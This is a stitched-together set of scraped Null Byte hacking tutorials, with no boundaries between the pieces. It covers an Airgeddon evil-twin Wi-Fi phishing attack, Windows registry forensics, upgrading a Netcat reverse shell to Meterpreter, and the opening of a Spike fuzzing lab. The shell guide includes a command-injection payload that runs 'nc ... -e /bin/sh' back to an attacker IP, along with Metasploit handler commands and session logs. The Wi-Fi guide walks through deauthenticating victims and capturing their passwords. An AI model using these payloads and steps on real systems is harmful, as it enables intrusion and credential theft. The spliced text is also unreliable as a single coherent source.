β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ 11 20% WPA2 β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ 3) β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ 6 15% WPA2 β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ 4) β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ 6 19% WPA2 β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ 5) β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ 2 17% WPA2 β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ 6) β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ 1 18% WPA2 β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ 7) β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ 11 42% WPA2 β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ (*) Network with clients ------------------------------------------------------ Select target network:Select the number of the target you wish to attack, and pressEnterto proceed to the next screen.Step 5: Gather the HandshakeNow, we'll select the type of de-authentication attack we want to use to kick the user off their trusted network. I recommend the second option, "Deauthaireplayattack," but different attacks will work better depending on the network.PressEnteronce you've made your selection, and you'll be asked if you'd like to enable DoS pursuit mode, which allows you to follow the AP if it moves to another channel. You can select yes (Y) or no (N) depending on your preference, and then pressEnter. Finally, you'll selectNfor using an interface with internet access. We won't need to for this attack, and it will make our attack more portable to not need an internet source.Handshake file selected: None Selected internet interface: None Select an option from menu: --------- 0. Return to Evil Twin attacks menu --------- 1. Deauth / disassoc amok mdk3 attack 2. Deauth aireplay attack 3. WIDS / WIPS / WDS Confusion attack --------- *Hint* If you can't deauth clients from an AP using an attack, choose another one :) --------- 2 If you want to integrate "DoS pursuit mode" on an Evil Twin attack, another additional wifi interface in monitor mode will be needed to be able to perform it Do you want to enable "DoS pursuit mode"? This will launch again the attack if target AP change its channel countering "channel hopping" [y/N] N At this point there are two options to prepare the captive portal. Either having an interface with internet access, or making a fake DNS using dnsspoof Are you going to use the interface with internet access method? If the answer is no ("n"), you'll need dnsspoof installed to continue. Both will be checked [y/N] NNext, it will ask you if you want to spoof your MAC address during the attack. In this case, I choseNfor "no."Now, if we don't already have a handshake for this network, we'll have to capture one now. Be VERY careful not to accidentally selectYfor "Do you already have a captured Handshake file?" if you do not actually have a handshake. There is no clear way to go back to the script without restarting if you make this mistake.Since we don't yet have a handshake, typeNfor no, and pressEnterto begin capturing.******************* Evil Twin AP attack with captive portal ******************* Interface wlan0mon selected. Mode: Monitor. Supported bands: 2.4Ghz Selected BSSID: β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ Selected channel: 11 Selected ESSID: β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ Deauthentication chosen method: Aireplay Handshake file selected: None --------- *Hint* Sslstrip technique is not infallible. It depends on many factors and not always work. Some browsers such as Mozilla Firefox latest versions are not affected --------- Do you want to spoof your MAC address during this attack? [y/N] N This attack requires that you have previously a WPA/WPA2 network captured Handshake file If you don't have a captured Handshake file from the target network you can get it now --------- Do you already have a captured Handshake file? Answer yes ("y") to enter the path or answers no ("n") to capture a new one now [y/N] NOnce the capture process has started, a window with red text sending deauth packets and a window with white text listening for handshakes will open. You'll need to wait until you see "WPA Handshake:" and then the BSSID address of your targeted network. In the example below, we're still waiting for a handshake.Once you see that you've got the handshake, you can exit out of theCapturing Handshakewindow. When the script asks you if you got the handshake, selectY, and save the handshake file. Next, select the location for you to write the stolen password to, and you're ready to go to the final step of configuring the phishing page.Step 6: Set Up the Phishing PageIn the last step before launching the attack, we'll set the language of the phishing page. The page provided by Airgeddon is pretty decent for testing out this style of attack. In this example, we'll select1for English. When you've made your selection, pressEnter, and the attack will begin with six windows opening to perform various functions of the attack simultaneously.Selected BSSID: β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ Selected channel: 11 Selected ESSID: β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ Deauthentication chosen method: Aireplay Handshake file selected: /root/handshake-β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ.cap Choose the language in which network clients will see the captive portal: --------- 0. Return to Evil Twin attacks menu --------- 1. English 2. Spanish 3. French 4. Catalan 5. Portuguese 6. Russian 7. Greek 8. Italian 9. Polish 10. German --------- *Hint* On Evil Twin attack with BeEF intergrated, in addition to obtaining keys using sniffing techniques, you can try to control the client's browser launching numerous attack vectors. The success of these will depend on many factors such as the kind of client's browser and its version ---------Step 7: Capture Network CredentialsWith the attack underway, the victim should be kicked off of their network and see our fake one as the only seemingly familiar option. Be patient, and pay attention to the network status in the top right window. This will tell you when a device joins the network, allowing you to see any password attempts they make when they're routed to the captive portal.When the victim joins your network, you'll see a flurry of activity like in the picture below. In the top-right corner, you'll be able to see any failed password attempts, which are checked against the handshake we gathered. This will continue until the victim inputs the correct password, and all of their internet requests (seen in the green text box) will fail until they do so.When the victim caves and finally enters the correct password, the windows will close except for the top-right window. The fake network will vanish, and the victim will be free to connect back to their trusted wireless network.The credentials should be displayed in the top-rightControlscreen, and you should copy and paste the password into a file to save, in case the script doesn't save the file correctly. This sometimes happens, so make sure not to forget this step or you might lose the password you just captured.Control Evil Twin AP Info // BSSID: β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ // Channel: 11 // ESSID: β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ Online time 00:01:40 Password captured successfully: /tmp/ag.control.sh: line 37: ${log_path}: ambiguous redirect β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ The password was saved on file: [/root/evil_twin_captive_portal_password-β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ.β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ.txt Press [Enter] on the main script window to continue, this window will be closedAfter this, you can close the window, and close down the tool by pressingCtrl + C. If we get a valid credential in this step, then our attack has worked, and we've got the Wi-Fi password by tricking the user into submitting it to our fake AP's phishing page!Defending Against an Evil Twin AP AttackThe best way of defending against an evil twin attack is to know about the tactic, and know that the signs of one should make you highly suspicious. If you abruptly lose the ability to connect to your trusted network and suddenly see an open wireless network with the same name, these are neither a coincidence nor a normal turn of events.Never connect to an unknown wireless network pretending to be yours, especially one without encryption. If you suspect your router is actually updating, turn off your Wi-Fi and plug into the router's Ethernet directly to see what the problem is.Thanks for reading this guide to evil twin AP attacks! If you have any questions or comments, feel free to leave a comment or reach me on Twitter@KodyKinzie. And check outour Wi-Fi hacking seriesfor more guides.Don't Miss:How to Hack WPA & WPA2 Wi-Fi Passwords with a Pixie-Dust Attack Using AirgeddonWant to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover photo and screenshots by Kody/Null ByteRelatedHow To:Null Byte & Null Space Labs Present: Wi-Fi Hacking, MITM Attacks & the USB Rubber DuckyHow To:The Beginner's Guide to Defending Against Wi-Fi HackingHow to Hack Wi-Fi:Getting Started with the Aircrack-Ng Suite of Wi-Fi Hacking ToolsHow to Hack Wi-Fi:Get Anyone's Wi-Fi Password Without Cracking Using WifiphisherHow to Hack Wi-Fi:Selecting a Good Wi-Fi Hacking StrategyHow To:Crack WPA & WPA2 Wi-Fi Passwords with PyritHow To:Hack Wi-Fi Networks with BettercapHow To:Scan, Fake & Attack Wi-Fi Networks with the ESP8266-Based WiFi DeautherHow To:Automate Wi-Fi Hacking with Wifite2How To:This Widget Lets You Open Wi-Fi Settings Faster, Share Passwords & More on Your iPhoneHow to Hack Wi-Fi:Creating an Evil Twin Wireless Access Point to Eavesdrop on DataHow to Hack Wi-Fi:Cracking WPA2 Passwords Using the New PMKID Hashcat AttackHow To:iOS 6 Broke Your Wi-Fi? Here's How to Fix Connection Problems on Your iPhone or iPadHow To:Easily See Passwords for Wi-Fi Networks You've Connected Your Android Device ToHow to Hack with Arduino:Building MacOS Payloads for Inserting a Wi-Fi BackdoorHow To:Easily Share Your Complicated Wi-Fi Password Using Your Nexus 5How To:Recover a Lost WiFi Password from Any DeviceHow To:Share Wi-Fi Adapters Across a Network with Airserv-NgHow To:Easily Store Your iPhone's Wi-Fi Passwords & Share Them with Anybody β€” Even Android UsersAndroid Basics:How to Connect to a Wi-Fi NetworkHow to Hack Wi-Fi:Breaking a WPS PIN to Get the Password with BullyHow to Hack Wi-Fi:Getting Started with Terms & TechnologiesHow To:Hack WiFi Passwords for Free Wireless Internet on Your PS3How to Hack with Arduino:Tracking Which Networks a Mac Has Connected To & WhenHow To:Hack WPA & WPA2 Wi-Fi Passwords with a Pixie-Dust Attack Using AirgeddonHow to Hack Wi-Fi:Disabling Security Cameras on Any Wireless Network with Aireplay-NgHow To:Share Any Password from Your iPhone to Other Apple DevicesHow to Hack Wi-Fi:Hunting Down & Cracking WEP NetworksHow To:Find & Share Local Wi-Fi Passwords for Free Internet Everywhere You GoHow To:Turn on Google Pixel's Wi-Fi Assistant to Get Secure Access on Open NetworksHow To:Track Wi-Fi Devices & Connect to Them Using ProbequestHow To:Hunt Down Wi-Fi Devices with a Directional AntennaNews:Project Zero Finds iPhone & Android Open to Bugs in Broadcom's Wi-Fi ChipsHow To:Hack 5 GHz Wi-Fi Networks with an Alfa Wi-Fi AdapterHacking Android:How to Create a Lab for Android Penetration TestingHow To:Get the Strongest Wi-Fi Connection on Your Android Every TimeHow to Hack Wi-Fi:Cracking WPA2-PSK Passwords Using Aircrack-NgHow To:Share Your Wi-Fi Password with a QR Code in Android 10How To:Hack Anyone's Facebook, Twitter or YouTube Account with Your Android DeviceHow To:You No Longer Have to Open Settings to Switch & Connect to Wi-Fi on Your iPhone (FINALLY!)
Hack Like a Pro: Digital Forensics for the Aspiring Hacker, Part 8 (More Windows Registry Forensics) Β« Null Byte :: WonderHowTo
Welcome back, my fledgling hackers!Let's continue to expand ourknowledge of digital forensics, to provide you the skills necessary to be a digital forensic analyst or investigator, as well make you a better hacker overall. In your attempts to enter a system or network undetected, it is key to understand what a skilled forensic investigator can learn about you, the alleged hacker.In this tutorial, we will look at several registry entries that will reveal what the attacker was doing on the suspect system. As Windows 7 is still the world's most widely used OS, by far, I will demonstrate these techniques on a Windows 7 machine.Obviously, if you are investigating one of the UNIX-like systems (OS X,Linux, BSD, Unix, etc.), this will not apply. If you are investigating a pre-Vista Windows system, many of these techniques will not apply. But Windows Vista, Windows 7, and Windows 8 are generally all very similar in their overall build and registry.Registry KeysThe registry can reveal a cornucopia of information on the attacker. Here we will look at few registry keys that we may want to look at to determine if the system has been compromised and how and who did it. Remember, the registry is made up up 5 "hives."HKEY_CLASSES_ROOT:configuration information on the application used to open filesHKEY_CURRENT_USER:profile of the currently logged-on userHKEY_LOCAL_MACHINE:configuration information including hardware and software settingsHKEY_USERS:contains all the loaded user profilesHKEY_CURRENT_CONFIG:hardware profile of the system at startupIf you need a refresher on the Windows registry, check out myPart 5 of Digital Forensics for the Aspiring Hacker, where I introduced forensics using the registry and we found evidence of the wireless access point the hacker was using in their attack.Also, we can view and edit the registry using "regedit" as well as many of the most popular digital forensic suites, such as Encase, FTK, Oxygen, Paraben, Helix, and others.The RecentDocs KeyThe Windows registry tracks so much information about the user's activities. In most cases, these registry keys are designed to make Windows run more efficiently and smoothly. As a forensic investigator, these keys are like a road map of the activities of the user or attacker.One of those keys is the "RecentDocs" key. It tracks the most recent documents used or opened on the system by file extension. It can be found at:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocsSo, for instance, the most recently used Word documents would be found under .doc or the .docx extension depending upon the version of Word they were created in (each key can hold up to the last 10 documents). If we go to the .docx extension, we see the last 10 Word documents listed under this key.When we click on one of those keys, it reveals information about the document as seen below. We can view the document data in both hex, to the left, and ASCII, to the right. In this case, it show that this document was aMetasploitcourse outline.In many cases, an attacker will upload a .tar file, so that is a good place to look for breach evidence. In general, you won't see a .tar file extension on a Windows machine, so the presence of an entry here would be something that needs further investigation. Check the files in the .tar key and see what they might reveal about the attack or attacker.In civil or policy violation investigations, evidence might be found in the various graphic file extensions such as .jpg, .gif, or .png.The TypedURLs KeyWhen the user types a URL in Internet Explorer, this value is stored in the registry at:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLsWhen we open that key in the registry, it lists the last URLs that the user visited with IE. This could reveal the source of malicious malware that was used in the breach, or in civil or policy violation types of investigations, may reveal what the user was looking for/at.The values will run from urI1 (the most recent) to urI25 (the oldest).IP AddressesThe registry also tracks the IP addresses of the user interfaces. Note that there may be numerous interfaces and this registry key tracks each interface's IP address and related information.As we can see below, we can find the IP address assigned to the interface, the subnet mask, and the time when the DHCP server leased the IP. In this way, we can tell whether the suspect was using that particular IP at the time of the intrusion or crime.Start Up Locations in the RegistryAs a forensic investigator, we often need to find what applications or services were set to start when the system starts. Malware is often set to start each time the system restarts to keep the attacker connected. This information can be located in the registry in literally tens of locations. We will look at a just a few of the most commonly set keys. As a hacker, these are the keys that you want to set to get your software to run automatically on the system.Probably the most used location is:HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunAny software/locations designated in these subkeys will start every time the system starts.Rootkitsand other malicious software can often be found here and they will start each time the system starts.RunOnce StartupIf the hacker just wanted the software to run once at start up, the subkey may be set here.HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceStart Up ServicesThe key below lists all the services that set to start at system startup. If the key is set to 2, the service starts automatically; if it is set to 3, the service must be started manually; and if the key is set to 4, the service is disabled.HKEY_LOCAL_MACHINE\System\CurrentControlSet\ServicesStart Legacy ApplicationsWhen legacy 16-bit applications are run, the program listed is run at:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\WOWStart When a Particular User Logs OnIn the following key, the values are run when the specific user logs in.HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunDigital forensicsis an excellent complementary skill to hacking, as hackers with knowledge of forensics "cover their tracks," and digital forensic investigators with hacking skills are more likely to track the attacker.Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseRelatedHack Like a Pro:Digital Forensics for the Aspiring Hacker, Part 5 (Windows Registry Forensics)Hack Like a Pro:Digital Forensics for the Aspiring Hacker, Part 1 (Tools & Techniques)Hack Like a Pro:Digital Forensics Using Kali, Part 1 (The Tools of a Forensic Investigator)News:Why YOU Should Study Digital ForensicsHack Like a Pro:Digital Forensics for the Aspiring Hacker, Part 11 (Using Splunk)Hack Like a Pro:Digital Forensics for the Aspiring Hacker, Part 9 (Finding Storage Device Artifacts in the Registry)How To:The Essential Skills to Becoming a Master HackerHow To:Become a Computer Forensics Pro with This $29 TrainingHack Like a Pro:Digital Forensics for the Aspiring Hacker, Part 6 (Using IDA Pro)Hack Like a Pro:Digital Forensics for the Aspiring Hacker, Part 12 (Windows Prefetch Files)Hack Like a Pro:Digital Forensics for the Aspiring Hacker, Part 2 (Network Forensics)Hack Like a Pro:Digital Forensics for the Aspiring Hacker, Part 7 (Windows Sysinternals)SPLOIT:Forensics with Metasploit ~ ( Recovering Deleted Files )News:How to Study for the White Hat Hacker Associate Certification (CWA)Hack Like a Pro:Digital Forensics for the Aspiring Hacker, Part 15 (Parsing Out Key Info from Memory)Hack Like a Pro:Digital Forensics for the Aspiring Hacker, Part 10 (Identifying Signatures of a Port Scan & DoS Attack)Hack Like a Pro:Digital Forensics for the Aspiring Hacker, Part 14 (Live Memory Forensics)News:What to Expect from Null Byte in 2015News:Airline Offers Frequent Flyer Miles to HackersHack Like a Pro:Digital Forensics Using Kali, Part 2 (Acquiring a Hard Drive Image for Analysis)News:Becoming a HackerHack Like a Pro:Digital Forensics Using Kali, Part 3 (Creating Cases in Autopsy & Sleuth Kit)Hack Like a Pro:Digital Forensics for the Aspiring Hacker, Part 16 (Extracting EXIF Data from Image Files)Hack Like a Pro:Digital Forensics for the Aspiring Hacker, Part 13 (Browser Forensics)How To:Why You Should Study to Be a HackerHack Like a Pro:How to Use the New p0f 3.0 for OS Fingerprinting & ForensicsHack Like a Pro:How to Hack Facebook (Facebook Password Extractor)Hack Like a Pro:Digital Forensics for the Aspiring Hacker, Part 3 (Recovering Deleted Files)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 6 (Networking Basics)Hack Like a Pro:Digital Forensics for the Aspiring Hacker, Part 4 (Evading Detection While DoSing)Hack Like a Pro:Getting Started with BackTrack, Your New Hacking SystemNews:Flawed Laptop Fingerprint Readers Make Your Windows Password Vulnerable to HackersNews:Sneaky! WhatsApp Adds Encryption to iCloud Backups on the SlyHow To:Install a Persistant Backdoor in Windows Using NetcatHack Like a Pro:Linux Basics for the Aspiring Hacker, Part 11 (Apache Web Servers)How To:Don't Get Caught! How to Protect Your Hard Drives from Data ForensicsNews:FIX WINDOWS 7 SLOW STARTUP TIMES...How To:log on Windows 7 with username & passwordNews:VARIOUS WINDOWS ISSUES RESOLVED BELOW...
How to Elevate a Netcat Shell to a Meterpreter Session for More Power & Control Β« Null Byte :: WonderHowTo
Popping a shell is often the main goal of a hacker, and it can be exciting when executed properly, but sometimes they do have their limitations. Metasploit's Meterpreter probably needs no introduction, but this powerful, dynamic payload can offer a leg up over normal shells. To prove it, we'll show how to take a normal command shell and elevate it to a Meterpreter session.Shell vs. MeterpreterA shellis basically an interface that acts as a shortcut to the commands of anoperating system. When it comes to hacking, there are two types of shells that are mainly talked about: bind shells and reverse shells.A bind shell effectively binds itself to a certain port on the target, and the attacking system connects to that listening port and a session is created. A reverse shell, on the other hand, actively connects from the target machine to the attacking machine, where a listener is waiting for incoming connections.Command shells provide a great way to really dig into the target, but they are not always the best option. Usually, they are constrained to the privileges of the user who initiated the shell, so the power that comes withroot-level accessisn't always available.Recommended on Amazon:Metasploit: The Penetration Tester's GuideMeterpreterallows us to run post-exploitation modules andprivilege escalationexploits locally on the target. It utilizes encrypted communication methods and nothing is written to disk during operation, making it a suitable weapon that leaves little to no evidence behind. Meterpreter offers aton of other featuresand is highly extensible, which makes it an excellent addition to any hacker's arsenal.Step 1: Start a ListenerTo get started, fire upMetasploit. Typemsfconsolein theterminaland we'll be greeted by a nice little welcome banner after it loads. We'll be using a great feature of Metasploit, which is the ability to set up a universal listener that can handle a wide range of different types of shells. Enter the following to load the module:use exploit/multi/handlerNext, we need to specify the listening host and port, using the IP address of our local machine and an arbitrary port number. We also need to set the payload β€” the versatile reverse TCP shell is an excellent choice here.msf5 exploit(multi/handler) > set lhost 172.16.1.100 lhost => 172.16.1.100 msf5 exploit(multi/handler) > set lport 1234 lport => 1234 msf5 exploit(multi/handler) > set payload linux/x86/shell/reverse_tcp payload => linux/x86/shell/reverse_tcpTypeoptionsat the prompt to verify that our settings are correct.msf5 exploit(multi/handler) > options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (linux/x86/shell/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 172.16.1.100 yes The listen address (an interface may be specified) LPORT 1234 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard TargetIt looks like we're good to go. Typerunto launch the handler, and it's now ready and waiting for an incoming connection.msf5 exploit(multi/handler) > run [*] Started reverse TCP handler on 172.16.1.100:1234Step 2: Get Shell with NetcatNetcatis a powerful networking utility commonly used to troubleshoot connectivity issues, but it can also be utilized as abackdoorvia command shells. We can use this tool,coupled with a command injection vulnerability, to spawn a shell and connect back to our local machine. If all goes well, the handler that we set up earlier will catch the shell and we'll be able to issue commands.This vulnerability lets us append system commands to the input for the ping utility.127.0.0.1 && nc 172.16.1.100 1234 -e /bin/shHere, we've tacked on the Netcat command to spawn a shell and connect to our local machine on port 1234:After a moment, back in the terminal with our handler, we see that a session is opened up. We can now issue commands likeidanduname -ato verify this.[*] Sending stage (36 bytes) to 172.16.1.102 [*] Command shell session 1 opened (172.16.1.100:1234 -> 172.16.1.102:53462) at 2019-01-29 15:28:28 -0600 id uid=33(www-data) gid=33(www-data) groups=33(www-data) uname -a Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/LinuxFinally, we need to background this session by pressingCtrl-Z, followed byYto confirm.^Z Background session 1? [y/N] y msf5 exploit(multi/handler) >Recommended on Amazon:Instant Netcat StarterStep 3: Elevate Shell to Meterpreter SessionNow that we have attained a session on the target, we can upgrade that humble shell to a full-fledged Meterpreter session. This will allow for greater flexibility when it comes to interacting with the target.In order to view any sessions that are currently open, typesessionsat the prompt. Below, we can see the session we opened earlier, along with its ID, shell type, and connection information.msf5 exploit(multi/handler) > sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 shell x86/linux 172.16.1.100:1234 -> 172.16.1.102:53462 (172.16.1.102)The easiest way to transform a regular session into a Meterpreter session is to use the-uflag. Issue the sessions command with the appropriate ID and watch the magic happen.msf5 exploit(multi/handler) > sessions -u 1 [*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1] [*] Upgrading session ID: 1 [*] Starting exploit/multi/handler [*] Started reverse TCP handler on 172.16.1.100:4433 [*] Sending stage (914728 bytes) to 172.16.1.102 [*] Meterpreter session 2 opened (172.16.1.100:4433 -> 172.16.1.102:42790) at 2019-01-29 15:30:28 -0600 [*] Command stager progress: 100.00% (773/773 bytes)Now it seems like nothing really happened, but in fact, we've opened a Meterpreter session in the background β€” it doesn't automatically drop us into it. If we issue thesessionscommand again, it will list our new Meterpreter session with an ID of 2. We can then use the-iflag to interact with it.msf5 exploit(multi/handler) > sessions -i 2 [*] Starting interaction with 2... meterpreter >And now we have a Meterpreter shell. However, there is one other way to elevate a normal shell to a Meterpreter session that is similar to the method outlined above, and that is to manually use theshell_to_meterpreterpost-exploitation module.Alternative Way to Elevate Shell to Meterpreter SessionTo load it, type the following.use post/multi/manage/shell_to_meterpreterAll we have to do is specify the existing session we want to upgrade. After that, just to be sure, we can view the current settings with theoptionscommand.msf5 post(multi/manage/shell_to_meterpreter) > set session 1 session => 1 msf5 post(multi/manage/shell_to_meterpreter) > options Module options (post/multi/manage/shell_to_meterpreter): Name Current Setting Required Description ---- --------------- -------- ----------- HANDLER true yes Start an exploit/multi/handler to receive the connection LHOST no IP of host that will receive the connection from the payload (Will try to auto detect). LPORT 4433 yes Port for payload to connect to. SESSION 1 yes The session to run this module on.Typerunto kick it off.msf5 post(multi/manage/shell_to_meterpreter) > run [*] Upgrading session ID: 1 [*] Starting exploit/multi/handler [*] Started reverse TCP handler on 172.16.1.100:4433 [*] Sending stage (914728 bytes) to 172.16.1.102 [*] Meterpreter session 3 opened (172.16.1.100:4433 -> 172.16.1.102:59832) at 2019-01-29 15:34:16 -0600 [*] Command stager progress: 100.00% (773/773 bytes) [*] Post module execution completedAgain, this opens up the new session in the background, so we have to issue thesessionscommand to determine the correct ID.msf5 post(multi/manage/shell_to_meterpreter) > sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 shell x86/linux 172.16.1.100:1234 -> 172.16.1.102:53462 (172.16.1.102) 3 meterpreter x86/linux 172.16.1.100:4433 -> 172.16.1.102:59832 (172.16.1.102)We can see that this new Meterpreter session has an ID of 3. Now we are ready to interact with it.msf5 post(multi/manage/shell_to_meterpreter) > sessions -i 3 [*] Starting interaction with 3... meterpreter >We now have a Meterpreter shell, and from here,the sky is the limit.Wrapping Thing's UpIn this tutorial, we learned how to take a regular old command shell and elevate it to Meterpreter status. We used a Netcat shell here, but any other type of shell should work with this method. Meterpreter offers a great deal of power and control over any target, so get out there and keep hacking away.Don't Miss:Null Byte's Guides on MetasploitFollow Null Byte onTwitter,Flipboard, andYouTubeSign up forNull Byte's weekly newsletterFollow WonderHowTo onFacebook,Twitter,Pinterest, andFlipboardWant to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover image byStockSnap/Pixabay; Screenshots by drd_/Null ByteRelatedHow To:Install a Persistant Backdoor in Windows Using NetcatHow To:Upgrade a Normal Command Shell to a Metasploit MeterpreterHow To:Get Root with Metasploit's Local Exploit SuggesterHow To:Use Meterpeter on OS XHow To:Get Root Access on OS X Mavericks and YosemiteHow to Meterpreter:Interactive Ruby Shell (A Quick Introduction)How To:Upload a Shell to a Web Server and Get Root (RFI): Part 2Hack Like a Pro:How to Use PowerSploit, Part 1 (Evading Antivirus Software)How to Meterpreter:Obtaining User Credentials with PowerShellHow To:Identify Missing Windows Patches for Easier ExploitationHow To:Attack a Vulnerable Practice Computer: A Guide from Scan to ShellSPLOIT:Forensics with Metasploit ~ ( Recovering Deleted Files )Hack Like a Pro:How to Remotely Install an Auto-Reconnecting Persistent Back Door on Someone's PCHow To:Create a Reverse Shell to Remotely Execute Root Commands Over Any Open Port Using NetCat or BASHHack Like a Pro:Hacking Samba on Ubuntu and Installing the MeterpreterNews:Reconnect to Victim's System Success
Hack Like a Pro: How to Build Your Own Exploits, Part 3 (Fuzzing with Spike to Find Overflows) Β« Null Byte :: WonderHowTo
Welcome back, my hacker novitiates!In theprevious two posts in this series, we looked at the basics of buffer overflows. In this post, we will look at one technique for finding buffer overflows. We will try to send random, oversized, and invalid data at a variable to see whether we can make it crash or overflow. This process is known as fuzzing. It is often the first step to developing an exploit, as we need to find some variable that is susceptible to overflowing.There are a number of commercial fuzzing tools, most notably Peach, which I hope to do a tutorial on soon. It is an excellent fuzzing tool, but it is not free. On the other hand, Kali has a number of fuzzing tools built in, including Bed, Sfuzz, and Powerfuzzer, among others.Fuzzing with SpikeAmong these free fuzzers, Spike is maybe the best. Spike is poorly documented and less than intuitive, but is powerful and adaptable once you become familiar with it. In fact, adaptability is probably Spike's strongest feature, while its ease of use is probably its weakest.In this tutorial, I hope to show you the basics of using Spike to lift the veil on its seemingly bewildering inner workings so that you can take what you learn here and run with this powerful tool to find your very own buffer overflow.Essentially, Spike is an API that enables us to quickly develop stress tests of the protocol or application of our choice. Since many of the protocols use similar data primitives, Spike gives us the capability too create these primitives and then vary them in ways they may be able to break the protocol or application.Step 1: Download & Install VulnserverTo learn and practice our fuzzing with Spike, let's download and install a purposely Vulnerable server for a Windows system. This server, known as vulnserver, can be downloaded fromhere. Download it and install it on a Windows system.To start Vulnserver, simply click on the .exe file or typevulnserveron the command line followed by the port you want Vulnserver to listen on. Vulnserver server listens on port 9999 by default, so if you simply execute the Vulnserver, it will listen for connections on port 9999. If you want Vulnserver to listen on a different port, simply run the executable followed by the port number such as:C:\vulnserver 2015This will create a vulnerable server listening on port 2015. In this lab, I will be using the default port 9999, but you can use whatever port you prefer.Now, let's try to connect to the Vulnserver withNetcatfrom our Kali attack system.kali > nc 192.168.181.129 9999As you can see below, Vulnserver displays its welcome banner and informs us that we can type HELP to get more information on the 